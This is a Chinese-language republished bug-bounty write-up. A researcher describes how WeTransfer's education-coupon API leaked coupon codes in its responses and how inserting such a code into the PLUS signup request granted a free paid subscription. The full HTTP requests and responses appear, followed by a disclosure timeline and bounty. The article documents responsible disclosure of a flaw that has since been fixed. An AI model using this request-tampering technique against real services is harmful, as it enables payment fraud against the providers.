freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

挖洞经验 | 看我如何免费获取价值€120的会员资格
2018-05-23 13:00:19

01.png

大概两个月前,由于我需要发送一个15G的文件,我的一个朋友借给我了他的WeTransfer账户使用,我留意了一下,他的这种WeTransfer PLUS会员每年的注册费是120欧元。出于挖洞者的好奇之心,我决定来看看WeTransfer的这种账户管理机制是否存在漏洞,非常凑巧,我由此发现了价值€500欧元的漏洞一枚。一切请听我详细说来。

WeTransfer是荷兰一个基于云端的免费超大文件临时中转网站,用户可以在网站进行免费的文件保存传输,每次的最大限度为2GB,文件保存时间为两周。WeTransfer具有许多人性化的功能:如无需注册、个性化上传设置、自由更换背景设置、上传文件自动接受病毒扫描等。WeTransfer的这些独特之处,使得其备受用户推崇使用。

寻找突破口

首先,我打算测试WeTransfer的支付系统,看其是否存在绕过漏洞,能免费猥琐的获得PLUS会员资格。为此,我先作了大量的请求测试,但没获取到任何有用信息。于是,我决定在Google里搜索“wetransfer plus free”试试,看看WeTransfer有没有发布什么促销方式,或许我可以从这个点下手突破。

we_0.png

从以上Google搜索结果中可以看出,WeTransfer针对用.edu邮箱注册的高校学生用户,可以免费提供一年的PLUS会员资格。

we_00.png

所以,随便用一个.edu为后缀的学校邮箱进行注册,它会有以下提示:

11111.png

发现漏洞异常

可惜的是,由于我手边确实没有,也获取不到任何学校类邮箱,所以,注册成功也获取不到确认链接啊,这就有点蛋疼了。但是,通过观察,我发现WeTransfer与发件人之间的一些消息机制存在问题。比如说,我用伪造的邮箱testttsttststst7@mail.edu进行注册,其向WeTransfer网站发送出去的HTTP请求是这样的:

POST /api/ui/education/coupons HTTP/1.1

Host: wetransfer.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0

Accept: application/json

Accept-Language: en-US,en;q=0.5

Referer: https://wetransfer.com/

X-Requested-With: XMLHttpRequest

Content-Type: application/json

Content-Length: 37

Cookie: <YOUR-COOKIES>

Connection: close

{“email”:”testttsttststst7@mail.edu”}

从这个POST中可以看出请求链接是/api/ui/education/coupons,coupon,优惠券!其它也没任何可疑之处,但是,当我检查这个POST的响应消息时,却发现了一些异常:

HTTP/1.1 200 OK

Date: Sat, 24 Mar 2018 10:34:02 GMT

Content-Type: application/json

Content-Length: 28

Connection: close

X-Compatibility-Version: 5

Set-Cookie: <Your-Cookies>

X-Content-Type-Options: nosniff

Vary: Accept-Encoding, Origin

ETag:

Cache-Control: max-age=0, private, must-revalidate

X-Request-Id:

X-Opaque:

X-Runtime: 0.089711

Strict-Transport-Security: max-age=15552000; includeSubDomains;

{

“code”: “9e0bca0a6d92”

}

响应消息中包含了一个“9e0bca0a6d92“的代码串,这个代码串应该就像注册成功给出的信息说明“我们会向你的邮箱发送一个会员资格确认链接”,也就是说,本来WeTransfer网站会向用户的注册邮箱中发送一个确认链接的,这个链接和这个代码串应该都是由网站API针对某个特定注册邮箱生成的,都具备唯一验证性功效,但是呢,这里的HTTP响应消息却不经意间就泄露了这个验证代码串。在此,我估计这个代码串就是coupon code (优惠券验证码)。

深入利用

所以,明白了WeTransfer网站的这种验证码生成机制,就剩下想办法来看看怎么利用了。首先,我想到的是,看看它的通常的注册页面是否存在这种验证码泄露问题。为此,我来到WeTransfer网站的PLUS会员注册页面https://wetransfer.com/plus进行普通注册,由于在注册页面开始或设置区域没有添加优惠券代码或验证码的地方,因此,我只能深入看看注册以后,能不能进行一些有效性验证。先点击“Annual subscription”,即包年120欧元注册的选项,填完详细的个人信息,点击提交。

2018-05-21_162634.png

这里我拦截到的网站请求包大致如下:

POST /api/ui/users HTTP/1.1

Host: wetransfer.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0

Accept: application/json

Accept-Language: en-US,en;q=0.5

Referer: https://wetransfer.com/

X-Requested-With: XMLHttpRequest

Content-Type: application/json

Content-Length: 485

Cookie: <Cookies>

Connection: close

{“billing”:”yearly”,”full_name”:”Khizer Javed”,”email”:”khizer@gmail.com”,”password”:”hahahaha@@##$_$##@@hahahaha”,”password_confirm”:”hahahaha@@##$_$##@@hahahaha”,”company_name”:”TestAccount-Res”,”street_and_number”:”Test address 10133″,”city”:”Islamabad”,”zipcode”:”44800″,”country_code”:”PK”,”vat_number”:””,”terms_of_service”:true,”convert”:””,”sig”:””,”trk”:”WT201610_HalfPanel_GotPlusClick”,”wt_sent”:0,”wt_from”:””,”page_version”:30,”language”:”en”}

看到其中存在的country_code、vat_number和street_and_number之类的构造,结合之前的学生优惠条件,我又按照其请求测试生成了一个优惠券代码5a9fa8cc51c3,并构造出“coupon_code”:”5a9fa8cc51c3″字段,把它添加到POST请求之中,再次进行发送:

{“billing”:”yearly”,”full_name”:”Khizer Javed”,”email”:”khizer@gmail.com”,”password”:”hahahaha@@##$_$##@@hahahaha”,”password_confirm”:”hahahaha@@##$_$##@@hahahaha”,”company_name”:”TestAccount-Res”,”street_and_number”:”Test address 10133″,”city”:”Islamabad”,”zipcode”:”44800″,”country_code”:”PK”,”vat_number”:””,”terms_of_service”:true,”coupon_code”:”5a9fa8cc51c3″,”convert”:””,”sig”:””,”trk”:”WT201610_HalfPanel_GotPlusClick”,”wt_sent”:0,”wt_from”:””,”page_version”:30,”language”:”en”}

转发该请求之后,其响应消息如下:

HTTP/1.1 201 Created

Date: Sat, 24 Mar 2018 10:26:29 GMT

Content-Type: application/json

Content-Length: 692

Connection: close

X-Compatibility-Version: 5

X-Content-Type-Options: nosniff

Vary: Accept-Encoding, Origin

ETag:

Cache-Control: max-age=0, private, must-revalidate

X-Request-Id:

X-Opaque:

X-Runtime: 0.449633

Strict-Transport-Security: max-age=15552000; includeSubDomains;

{

“user”: {

“active_subscription”: false,

“subscription_expires_at”: null,

“autorenewal_enabled”: false,

“autorenewal_failed”: false,

“manual_payment_option_available”: true,

“profile_picture_url”: null,

“profile_picture_thumbnail_url”: null,

“subdomain_name”: null,

“language”: “en”,

“transfer_default_expiry”: 2592000,

“full_name”: “Khizer Javed”,

“storage_full”: false,

“id”: 1431584,

“email”: “khizer@gmail.com”

},

“order_completed”: {

“successful”: true,

“renewal”: false,

“duration”: “year”,

“free”: true

},

“redirect_to_url”: “http://wetransfer.com/payment/completed?duration=year

}

GOD,竟然就这样成功获得了价值120欧一年的PLUS会员资格,真是不敢相信!

22222.png

漏洞报送进程

2018.3.24 漏洞初报

2018.3.25 wetransfer对漏洞进行响应

2018.5.15  漏洞修复

最终奖金: €500欧元

*参考来源:securitybreached,FreeBuf 小编 clouds 编译,转载请注明来自 FreeBuf.COM     

# 挖洞经验 # WeTransfer
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者